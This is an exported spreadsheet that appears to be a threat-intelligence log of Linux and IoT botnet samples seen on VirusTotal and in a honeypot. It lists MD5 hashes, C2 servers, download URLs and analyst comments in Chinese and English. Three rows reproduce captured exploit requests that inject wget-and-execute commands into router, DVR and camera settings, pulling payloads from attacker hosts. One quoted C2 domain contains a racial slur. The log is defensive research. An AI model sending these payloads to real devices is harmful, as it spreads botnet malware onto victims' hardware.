ABCDEFGHIJKLMNOPQRSTUVWXYZAAAB
1
First SeenData SourceThreat NameFile TypeCPU ArchitectureSample MD5 / PayloadC2VT Detection RatioCommentsComments (From Google Translate)Twitter / Blog
2
20191209VirusTotalELFx86-3225c5d70a0403a1477d03f23fb54dc894C2: syn.l11l1.com:18881一个bot样本,样本来自VirusTotal,目前VirusTotal 1识别,不确定具体功能
md5: 25c5d70a0403a1477d03f23fb54dc894
疑似C2: syn.l11l1.com:1888
另一个关联的ELF样本:
b1fcab441a1221b33206924f12af64a0
疑似C2: ccyk.l11l1.com:178
C2 URL上还有另一个PE样本:
http://syn.l11l1.com/yk.exe		One bot sample, from VirusTotal, currently identified by VirusTotal 1, specific function unknown.

MD5: 25c5d70a0403a1477d03f23fb54dc894

Suspected C2: syn.l11l1.com:1888

Another associated ELF sample:

b1fcab441a1221b33206924f12af64a0

Suspected C2: ccyk.l11l1.com:178

Another PE sample is also present at the C2 URL:

http://syn.l11l1.com/yk.exe
3
20191125VirusTotalELFx86-642808d554258c9d93c44cf259f56276300这是一个bot样本, 样本来自VirusTotal,不过已经被intezer分析并发blog了
2808d554258c9d93c44cf259f5627630 (这是我早上分析的样本,VirusTotal 0识别)
2bef22301354ea36cfdf79d763f451d1 (这是通过C2信息关联出来的样本,intezer已经分析)
https://www.intezer.com/blog-acbackdoor-analysis-of-a-new-multiplatform-backdoor/		This is a bot sample from VirusTotal, but it has already been analyzed and posted on the Intezer blog.

2808d554258c9d93c44cf259f5627630 (This is the sample I analyzed this morning; VirusTotal identified it as 0)

2bef22301354ea36cfdf79d763f451d1 (This is a sample identified through C2 information; Intezer has already analyzed it)

https://www.intezer.com/blog-acbackdoor-analysis-of-a-new-multiplatform-backdoor/
4
20191120Anglerfish HoneypotELFPOST /html/sntp.html HTTP/1.1
DNT: 1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Host: {target}
sntpenable=1&pritimeserver=Other&otherpritimeserver=%60cd+%2Ftmp%3B+wget+http%3A%2F%2Fcncg.me%2Fz%60&timezone=0&save=Submit&submit=submitted		Not Support未知的一个exploit,传播的样本是Gafgyt
URL:http://cncg.me/z		An unknown exploit, the sample propagating is Gafgyt

URL: http://cncg.me/z		https://twitter.com/zom3y3/status/1201356330528722945
5
20191025VirusTotalLinux.DaclsELFx86-6480c0efb9e129f7f9b05a783df6959812TCP: 172.93.201.219:443
TCP: 107.172.197.175:443
TCP: 198.180.198.6:443		这是上周五发现的一个新的bot样本,样本来自VirusTotal,当前7识别(发现时是2识别),后门功能完善。
bot程序疑似存在的6个模块:
/bin/bash (执行系统命令)
plugin_file (疑似文件管理)
plugin_process (疑似进程管理)
plugin_test (未知)
plugin_reverse_p2p (未知)
logsend (里面又包含一些扫描的功能/探测信息)
硬编码了3个c2:
172.93.201.219:443
107.172.197.175:443
198.180.198.6:443
从样本本身,目前没有关联出更多的信息,VirusTotal上扫了yara也就只有这一个样本		This is a new bot sample discovered last Friday. The sample comes from VirusTotal and is currently identified as a 7-point bot (it was identified as a 2-point bot at the time of discovery). The backdoor functionality is complete.

The bot program appears to have six modules:

/bin/bash (executes system commands)

plugin_file (suspected file management)

plugin_process (suspected process management)

plugin_test (unknown)

plugin_reverse_p2p (unknown)

logsend (contains some scanning/probe information)

Three C2 servers are hardcoded:

172.93.201.219:443

107.172.197.175:443

198.180.198.6:443

From the sample itself, no further information can be derived. A scan of Yara on VirusTotal only yielded this one sample.		https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/
6
20190830Anglerfish HoneypotELFalld7aa37dc9954509bcc26368f916d1fffC2: 80.82.65.213:374205这个样本会扫描TCP/34567,看起来是集成了DVRIP 0-day exploit
C2 通过DNS TXT传递
dig typicalniggerdayatthecoolaidparty.n1gger.com TXT +short
"80.82.65.213"
C2: 80.82.65.213:37420
https://www.virustotal.com/gui/file/5be892b089400fd57b1a0e200ea4c2510dd35afa557a1bd2c392cf8f6aa2f289/detection		This sample scans TCP/34567 and appears to integrate a DVRIP 0-day exploit.

C2 is transmitted via DNS TXT:

dig typicalniggerdayatthecoolaidparty.n1gger.com TXT +short

"80.82.65.213"

C2: 80.82.65.213:37420

https://www.virustotal.com/gui/file/5be892b089400fd57b1a0e200ea4c2510dd35afa557a1bd2c392cf8f6aa2f289/detection		https://blog.netlab.360.com/the-botnet-cluster-on-185-244-25-0-24-en/
7
20190830Anglerfish HoneypotLILIN DVR 0-dayELFarmDVRPOST /dvr/cmd HTTP/1.1
Host: {target}:8000
Accept-Encoding: gzip, deflate
Connection: keep-alive
Accept: */*
User-Agent: python-requests/2.22.0
Content-type: multipart/form-data; boundary=----DVRBoundary
Content-Length: 356
Authorization: Basic cm9vdDppY2F0Y2g5OQ==

------DVRBoundary
Content-Disposition: form-data; name=""


------DVRBoundary
Content-Disposition: form-data; name="command.xml"

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?><DVR Platform="Hi3520"><NTPUpdate Server="pool.ntp.org&wget http://103.27.185.139/icatch.1.3.23s -O /zconf/123; sh /zconf/123&true" /></DVR>
------DVRBoundary--		http://lakusdvroa.com:8080/Not Support这看起来是一个新的RCE exploit, 没有搜到公开的漏洞,传播的样本我看有打上tag:chalubo
10ac26ef8571896efa3ee9495c0b71f5 样本VirusTotal 0识别
This appears to be a new RCE exploit. No publicly disclosed vulnerabilities were found, but the sample being distributed seems to be tagged: chalubo

Sample VirusTotal 0 identified: 10ac26ef8571896efa3ee9495c0b71f5

https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day-en/
8
20190826VirusTotalRobotoELFx86-644cd7bcd0960a69500aa80f32762d72bcUDP: 186.46.45.252:52085
UDP: 91.134.16.11:58436
UDP: 120.150.43.45:49252
UDP: 213.159.27.5:57491
UDP: 66.113.179.13:33543		2这个看起来是通过p2p通信的bot样本,目前连接的C2节点看起来是固定的,VirusTotal 2识别。
功能未知,字符串上看起来是恶意的。
已知节点:
UDP: 186.46.45.252:52085
UDP: 91.134.16.11:58436
UDP: 120.150.43.45:49252
UDP: 213.159.27.5:57491
UDP: 66.113.179.13:33543
https://analyze.intezer.com/#/analyses/d77c8d8e-50a6-4787-8a6d-a50e05f567e9		This appears to be a bot sample communicating via peer-to-peer (P2P). The currently connected C2 node seems to be fixed, as identified by VirusTotal 2.

Function unknown, but the string appears malicious.

Known nodes:

UDP: 186.46.45.252:52085

UDP: 91.134.16.11:58436

UDP: 120.150.43.45:49252

UDP: 213.159.27.5:57491

UDP: 66.113.179.13:33543

https://analyze.intezer.com/#/analyses/d77c8d8e-50a6-4787-8a6d-a50e05f567e9		https://blog.netlab.360.com/the-awaiting-roboto-botnet-en/
9
20190823VirusTotalELFx86-6421e34a9286fb5856e7933519f28d32a30我和“渣兔”分析了半天,确实是个新家族botnet,不过却是red team测试工具。
我误以为 "domain.com" api被人利用了,用来传递信息,隐藏C2
https://github.com/its-a-feature/Apfell		After analyzing it for a long time with "ZhaTu," it's indeed a new family of botnets, but it's actually a testing tool from the Red Team.

I mistakenly thought the "domain.com" API was being exploited to transmit information and hide a C2 server.

https://github.com/its-a-feature/Apfell
10
20190725VirusTotalELFarmdf6d69bad17cc0863986e75032586e0510这是一个针对Antminer矿机(armhf)劫持矿机钱包地址,可以进行SSH和Antminer web升级接口扫描,并横向传播的样本。
VirusTotal 已有大量识别为BitCoinMiner,但实际上他不是挖矿程序。
相关样本url:
http://bitmsfser.info/bt/s2
http://bitmsfser.info/bt/s
http://bitmain.cool/bt/1u
MD5 (s) = 1fe3e4cf9fd129de4250d62dc05f5b61
MD5 (s2) = df6d69bad17cc0863986e75032586e05
MD5 (1u) = f175e232a05ae8b186880f93ced92895		This is a sample that hijacks the wallet address of Antminer (ARMHF) mining rigs, performs SSH and Antminer web upgrade interface scans, and propagates laterally.

VirusTotal has identified many of these as BitcoinMiner, but they are not actually mining programs.

Related sample URLs:

http://bitmsfser.info/bt/s2

http://bitmsfser.info/bt/s

http://bitmain.cool/bt/1u

MD5 (s) = 1fe3e4cf9fd129de4250d62dc05f5b61

MD5 (s2) = df6d69bad17cc0863986e75032586e05

MD5 (1u) = f175e232a05ae8b186880f93ced92895
11
20190704Anglerfish HoneypotELFall97491cd28573e693ef007c4e852421beraiseyourdongers.pw:65930这是一个bot样本, VirusTotal 0识别, C2: raiseyourdongers.pw:6593,文件取名叫fbot,不确定跟fbot有没有关系,函数相似性只看到引用了checksum函数

http://5.206.227.65/codingdrunk/fbot.arm7 		This is a bot sample, VirusTotal 0 identified, C2: raiseyourdongers.pw:6593, the file is named fbot, it's unclear if it's related to fbot, the function similarity only shows a reference to the checksum function.

http://5.206.227.65/codingdrunk/fbot.arm7
12
20190701Anglerfish HoneypotELFall721c4c0f60546e8d4dda282d4207e92ecncc.duckdns.org:18001这是一个Bot样本,VirusTotal 1识别,C2: cncc.duckdns.org:1800,有DDoS功能,复用了mirai checksum代码

2019-06-30 11:54:50 http://185.99.254.29/bins/arm7 a7a3ffbbd8b8ce7546f496f7b0412d9e ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
This is a bot sample, identified by VirusTotal 1, C2: cncc.duckdns.org:1800, with DDoS capabilities, and reuses Mirai checksum code.

2019-06-30 11:54:50 http://185.99.254.29/bins/arm7 a7a3ffbbd8b8ce7546f496f7b0412d9e ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped

13
20190613VirusTotalELFx86cf5b2c91c7b6f6cc72a99b9bb141e8ae114.118.80.160:4431这是一个bot样本,VirusTotal 1识别,疑似c2: 114.118.80.160:443(当前未活跃)
md5: cf5b2c91c7b6f6cc72a99b9bb141e8ae		This is a bot sample, identified by VirusTotal 1, suspected c2: 114.118.80.160:443 (currently inactive)

MD5: cf5b2c91c7b6f6cc72a99b9bb141e8ae
14
20190528VirusTotalLinux.NgiowebELFall827ecf99001fa66de513fe5281ce064d169.239.128.166:443
185.244.149.73:443
enutofish-pronadimoful-multihitision.org:443		0这是一个bot样本,VirusTotal 0识别
c2:
169.239.128.166:443
185.244.149.73:443
enutofish-pronadimoful-multihitision.org:443		This is a bot sample, identified by VirusTotal 0.

c2:

169.239.128.166:443

185.244.149.73:443

enutofish-pronadimoful-multihitision.org:443		https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/
15
20190513Anglerfish HoneypotELFarmc7f77db8cb3b353b9a238cd7e515de20cnc.mariokartayy.com:528690这是一个bot样本,VirusTotal 0识别,C2: cnc.mariokartayy.com:52869,支持2种类型DDoS (UDP,TCP)
md5: c7f77db8cb3b353b9a238cd7e515de20		This is a bot sample, identified by VirusTotal 0, C2: cnc.mariokartayy.com: 52869, supports two types of DDoS attacks (UDP, TCP)

md5: c7f77db8cb3b353b9a238cd7e515de20		https://twitter.com/zom3y3/status/1128227886547079168
16
20190506VirusTotalELFx8610c73149cdf2690e7e82b4aec40eb383176.32.35.23:129561这是一个bot样本,VirusTotal 1识别,有DDoS功能,c2: 176.32.35.23:12956
SentinelOne ==> DFI - Malicious ELF
10c73149cdf2690e7e82b4aec40eb383		This is a bot sample, identified by VirusTotal 1, with DDoS capability, c2: 176.32.35.23:12956

SentinelOne ==> DFI - Malicious ELF

10c73149cdf2690e7e82b4aec40eb383		https://twitter.com/zom3y3/status/1126056561170714624
17
20190504Anglerfish HoneypotTsunamiELFx868ad6a59dff8fd98529ffab0badec818754.36.212.123:806724It's a variant of Tsunami Botnet, and it supports 22 types of DDoS attacks, kills 360+ known bots(filename), contains 7 methods of exploits and uses "fast-flux" technology for hiding download server.
md5: 8ad6a59dff8fd98529ffab0badec8187
c2: 54.36.212.123:8067		It's a variant of Tsunami Botnet, and it supports 22 types of DDoS attacks, kills 360+ known bots(filename), contains 7 methods of exploits and uses "fast-flux" technology for hiding download server.
md5: 8ad6a59dff8fd98529ffab0badec8187
c2: 54.36.212.123:8067		https://twitter.com/zom3y3/status/1124971992916979712
18
20190424Anglerfish HoneypotELFallhttp://35.235.102.123:80/golang1/gobot.xxxuwsedrftgyhujikol.sytes.net:8080It's a new family of IRC botnet which targets for 4 types of operating systems including MacOS, Linux, FreeBSD and Windows.It's a new family of IRC botnet which targets for 4 types of operating systems including MacOS, Linux, FreeBSD and Windows.https://twitter.com/zom3y3/status/1126069110155034624
19
20190424Anglerfish HoneypotGodluaELFx86-641b9de5b3118b1a745e2bfdecc71630f1c.heheda.tk:653141这是一个bot样本,疑似C2: c.heheda.tk:65314 (C2传输内容看起来是加密的)
md5:1b9de5b3118b1a745e2bfdecc71630f1
VirusTotal 1识别:DrWeb ==> Linux.Siggen.1594

相关样本URL:
http://104.238.151.101/run.sh (这个shell脚本负责传播kerberods,文件末尾注释了js挖矿,xmrig以及python反弹shell功能)
https://dd.heheda.tk/i.jpg (跟run.sh内容一致,md5一样)
https://dd.heheda.tk/x86_64-static-linux-uclibc.jpg		This is a bot sample, suspected C2: c.heheda.tk:65314 (C2 transmission content appears to be encrypted)

MD5: 1b9de5b3118b1a745e2bfdecc71630f1

VirusTotal 1 identification: DrWeb ==> Linux.Siggen.1594

Related sample URLs:

http://104.238.151.101/run.sh (This shell script is responsible for spreading Kerberods; the end of the file comments out JavaScript mining, XMRIG, and Python reverse shell functionality)

https://dd.heheda.tk/i.jpg (Content identical to run.sh, same MD5)

https://dd.heheda.tk/x86_64-static-linux-uclibc.jpg		https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/
20
20190410Anglerfish HoneypotELFarm054ec18660bab0fc4da4d0495c840483167.99.8.99:50101sample: http://167.99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483
这是一个bot样本,DDoS功能看起来还在开发中,VirusTotal上有一家识别,疑似C2: 167.99.8.99:5010
Ikarus ==> Trojan.Linux.Agent

其它相关样本:
http://167.99.8.99:80/nr.spc 7f82f7b3558c34058da0d49054f593c4
http://167.99.8.99:80/nr.ppc 7e8b4b7271540685f342cee7f4e7c9c9
http://167.99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483		Sample: http://167.99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483

This is a bot sample. The DDoS functionality appears to be under development. VirusTotal has a provider that identifies it, suspected to be a C2 server: 167.99.8.99:5010

Ikarus ==> Trojan.Linux.Agent

Other related samples:

http://167.99.8.99:80/nr.spc 7f82f7b3558c34058da0d49054f593c4

http://167.99.8.99:80/nr.ppc 7e8b4b7271540685f342cee7f4e7c9c9

http://167.99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483
21
20190409Anglerfish HoneypotELFPOST //webs/sysTimeCfgEx HTTP/1.1
Host: {target}
Accept-Encoding: identity
Content-Length: 186
systemdate=2019-3-27&systemtime=15:39:32&dwTimeZone=30&updatemode=0&ntpHost=$(wget http://181.174.166.164/welcom -O/tmp/welcome;/bin/sh ./tmp/welcome)&ntpPort=123&timezonecon=0		Not SupportAn unknown exploit is targeting for a IPCamera device, and loading mirai botnet.
c2: 149.255.36.139:1747
sample urls:
http://181[.]174.166.164/welcom
http://181[.]174.166.164/bl.arm
http://181[.]174.166.164/bl.mips
http://181[.]174.166.164/bl.mipsel		An unknown exploit is targeting for a IPCamera device, and loading mirai botnet.
c2: 149.255.36.139:1747
sample urls:
http://181[.]174.166.164/welcom
http://181[.]174.166.164/bl.arm
http://181[.]174.166.164/bl.mips
http://181[.]174.166.164/bl.mipsel		https://twitter.com/zom3y3/status/1115481065701830657
22
20190325VirusTotalELFmipsf00608d43e6c031501349a1dcae1ffda80.211.245.39:10021a new family botnet, probably c2: 80.211.245.39:1002
sample: f00608d43e6c031501349a1dcae1ffda		a new family botnet, probably c2: 80.211.245.39:1002
sample: f00608d43e6c031501349a1dcae1ffda		https://twitter.com/zom3y3/status/1110750663900684288
23
20190322VirusTotalELFarmhttp://103.242.118.63/intelligence/172.104.182.244:300030It looks that someone is hunting for "NETGEAR R8000" and "Synology DiskStation" now, open reverse shell and tor proxy on target device.
1. open reverse shell on port 12345 (limit access)
2. open tor proxy on port 20010 and 40010
3. connect to 172.104.182.244:30003		It looks that someone is hunting for "NETGEAR R8000" and "Synology DiskStation" now, open reverse shell and tor proxy on target device.
1. open reverse shell on port 12345 (limit access)
2. open tor proxy on port 20010 and 40010
3. connect to 172.104.182.244:30003		https://twitter.com/zom3y3/status/1109044920755482624
24
20190315Anglerfish HoneypotELFmips1a45ca278567eebe9ef80ae579608fb0wpceservice.hldns.ru:14880这是一个bot样本, VirusTotal 0识别, C2: wpceservice.hldns.ru:1488
C2活的, 当前指令: newscan>37.115.151.0/8		This is a bot sample, identified by VirusTotal 0, C2: wpceservice.hldns.ru:1488

C2 is active, current command: newscan>37.115.151.0/8		https://twitter.com/zom3y3/status/1110748371227041792
25
20190221VirusTotalELFx86-640a0232462faefa4f3e63c4e4709f1fd3bing.xxhost.ru:4430这个样本疑似socks代理相关的bot样本, 疑似c2:bing.xxhost.ru:443, VirusTotal 0识别This sample is suspected to be a bot sample related to SOCKS proxy, possibly c2:bing.xxhost.ru:443, VirusTotal 0 identified.https://twitter.com/zom3y3/status/1098540349893427200
26
20190213ELFarm87ad0f2c375e0bc0055b44f41997517ens3.clemenillivraytine.com:4434Torii Botnet, probably c2: ns3[.]clemenillivraytine[.]com:443
sample: 87ad0f2c375e0bc0055b44f41997517e		Torii Botnet, probably c2: ns3[.]clemenillivraytine[.]com:443
sample: 87ad0f2c375e0bc0055b44f41997517e		https://twitter.com/zom3y3/status/1095611300992839680
27
20190109VirusTotalELFx86-64f7731ebf46e9547835836c2b495716aahttp://1.oo00oo.info:80/bigc/srv/index.php0md5:f7731ebf46e9547835836c2b495716aa
这是一个bot样本,VirusTotal上0识别,C2: http://1.oo00oo.info:80/bigc/srv/index.php		md5:f7731ebf46e9547835836c2b495716aa

This is a bot sample, with 0 recognitions on VirusTotal. C2: http://1.oo00oo.info:80/bigc/srv/index.php		https://twitter.com/zom3y3/status/1082850004593569792
28
20190104VirusTotalELFx86-64cb89554f12b71418151872fc3a2d6f57api.python-pip.win:801md5:cb89554f12b71418151872fc3a2d6f57
这是一个bot样本,C2: api.python-pip.win:80
VirusTotal上有一家杀软识别 Sophos ==> Linux/Rekoobe-B (很老的botnet,但不确定是否有更新,或者识别准确)		md5:cb89554f12b71418151872fc3a2d6f57

This is a bot sample, C2: api.python-pip.win:80

VirusTotal lists an antivirus program that identifies Sophos as Linux/Rekoobe-B (a very old botnet, but it's uncertain if it's been updated or if the identification is accurate).		https://twitter.com/zom3y3/status/1081129900965150722
29
20181212VirusTotalELFarm,mips
0IoT 高级恶意软件威胁案例,未公开IoT advanced malware threat case, not disclosed.
30
20181128VirusTotalXorSSHELFx86-645495e84480a96ba3eb4b42fb41746e29scan9173.com:60061这是一个bot样本,代码是基于XorDDoS改的,C2: scan9173.com:6006
VirusTotal上只有一家杀软识别,Rising检测为Trojan.DDoS-Xor/Linux!1.A3E4 (CLASSIC)
5495e84480a96ba3eb4b42fb41746e29		This is a bot sample; the code is based on XorDDoS and modified. C2: scan9173.com:6006

Only one antivirus software on VirusTotal identifies it. Rising detects it as Trojan.DDoS-Xor/Linux!1.A3E4 (CLASSIC)

5495e84480a96ba3eb4b42fb41746e29		https://twitter.com/zom3y3/status/1072353654366187520
31
20181126Anglerfish HoneypotELFarm204b4cc2a99ba16b0651a627f3d47764185.244.25.177:407210这是样本是一个新的botnet家族,VirusTotal上0识别,有DDoS功能,疑似C2:185.244.25.177:40721
204b4cc2a99ba16b0651a627f3d47764		This sample is from a new Botnet family, with 0 detected on VirusTotal, and has DDoS protection. Suspected C2 address: 185.244.25.177:40721

204b4cc2a99ba16b0651a627f3d47764		https://twitter.com/zom3y3/status/1066902834032009217
32
20181123VirusTotalELF_IMEIJELFarm5cf13e9f1d988aa27a869dc5368f605awww.7895237.cn:99831这个样本ELF_IMEIJ (jiemihttp) 的更新版本,之前趋势把他命名为ELF_IMEIJ ,简单google搜了一下17年以后还没有见到后续报道
对比 a16a281cbe544af40f8463c7f5186496 可以看到有一些更新,包括TCP/UDP DDoS攻击方式,新增https CC攻击等
5cf13e9f1d988aa27a869dc5368f605a		This sample is an updated version of ELF_IMEIJ (jiemihttp). Trend Micro previously named it ELF_IMEIJ, but a simple Google search shows no follow-up reports since 2017.

Comparing it to a16a281cbe544af40f8463c7f5186496, some updates can be seen, including TCP/UDP DDoS attack methods and the addition of HTTPS CC attacks.

5cf13e9f1d988aa27a869dc5368f605a		https://twitter.com/zom3y3/status/1065930974075084800
33
20181123Anglerfish HoneypotELFmips0329c69d07f674267740f4bef8914342185.244.25.254:61291这个样本是一个bot样本,疑似C2:185.244.25.254:6129
VirusTotal上有一家杀软识别 Ikarus:Trojan.Linux.Tsunami,不过这显然是误报。
0329c69d07f674267740f4bef8914342		This sample is a bot sample, suspected to be C2: 185.244.25.254:6129. VirusTotal lists an antivirus program identifying Ikarus as Trojan.Linux.Tsunami, but this is clearly a false positive.

0329c69d07f674267740f4bef8914342		https://twitter.com/zom3y3/status/1065934749909151744
34
20181121Anglerfish HoneypotELFarm39e4adea8c9c4e929892a5e7e453c10546.243.189.102:4320这是一个bot样本,VirusTotal上0识别,疑似c2: 46.243.189.102:432
另外这个IP上曾经传播过mirai,这个也可能是mirai变种,不过上线协议跟mirai的又匹配不上
39e4adea8c9c4e929892a5e7e453c105		This is a bot sample, with 0 detected on VirusTotal, suspected C2: 46.243.189.102:432

This IP has previously propagated Mirai, so this could also be a Mirai variant, but its uplink protocol doesn't match Mirai's.

39e4adea8c9c4e929892a5e7e453c105		https://twitter.com/zom3y3/status/1065936809375350784
35
20181120VirusTotalELFx86797e7153e2ddbad317a4f48a511acc3251.microsft-update.com:1780这是一个bot样本,包括windows和linux版本, 时间比较久了18年4月份捕获的,这个样本在VirusTotal上至今 0 识别。
c2: 51.microsft-update.com:178
另外这个样本的c2 域名和中文字符串都很有意思
797e7153e2ddbad317a4f48a511acc32		This is a bot sample, including Windows and Linux versions. It was captured in April 2018, and has been around for a while. VirusTotal has yet to identify any bots using it.

c2: 51.microsft-update.com:178

Additionally, the c2 domain name and Chinese character strings in this sample are quite interesting:

797e7153e2ddbad317a4f48a511acc32		https://twitter.com/zom3y3/status/1064840407308099584
36
20181120VirusTotalELFx86-64daca1d5e464d3320f90b773c1e355211seoseo.spider-baidu.com:800这是另一个新家族的bot样本,VirusTotal上 0 识别,c2: seo.spider-sina.com:80
样本上线包是一个字符串: gayman
daca1d5e464d3320f90b773c1e355211
跟他相关联的样本:03dac0129075bdde2138f2a12bc8c904 已经被其他杀软识别了(后来文集认为是未知家族,只是加壳被杀软识别)
c2: seoseo.spider-baidu.com:80		This is a sample from another new bot family, identified as 0 on VirusTotal, c2: seo.spider-sina.com:80

The sample's upload packet is a string: gayman

daca1d5e464d3320f90b773c1e355211

A related sample: 03dac0129075bdde2138f2a12bc8c904 has already been identified by other antivirus software (later identified by Wenji as belonging to an unknown family, simply using a packer to be detected by antivirus software).

c2: seoseo.spider-baidu.com:80
37
20181119VirusTotalELFx86-64bcc79f90cf253c6fa6be10dcaec0f4ec43.251.17.126:18820这个是一个bot样本,有C2机制,VirusTotal上 0 识别,样本的代码可以看出有集成一些开源代码的痕迹。
另外可以从样本中看到中文字符串等。
bcc79f90cf253c6fa6be10dcaec0f4ec
c2: 43.251.17.126:1882		This is a bot sample with a C2 mechanism. It has a 0% recognition rate on VirusTotal. The sample's code shows traces of integrating some open-source code.

Additionally, Chinese characters can be seen in the sample.

bcc79f90cf253c6fa6be10dcaec0f4ec

c2: 43.251.17.126:1882		https://twitter.com/zom3y3/status/1064377926181769216
38
20181109VirusTotalSatanELFx865a5676827c8c818d6d201e903109ec1ehttp://139.180.219.208/0这个样本是跟1e22346711916fb0b02964bb4a3d3a1a同一团伙的,看起来属于bot样本,有C2机制,VirusTotal 上的杀软都没能检测出来。
5a5676827c8c818d6d201e903109ec1e		This sample belongs to the same group as 1e22346711916fb0b02964bb4a3d3a1a, and appears to be a bot sample with a C2 mechanism. Even antivirus software on VirusTotal failed to detect it.

5a5676827c8c818d6d201e903109ec1e		https://twitter.com/zom3y3/status/1062211186798653440
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100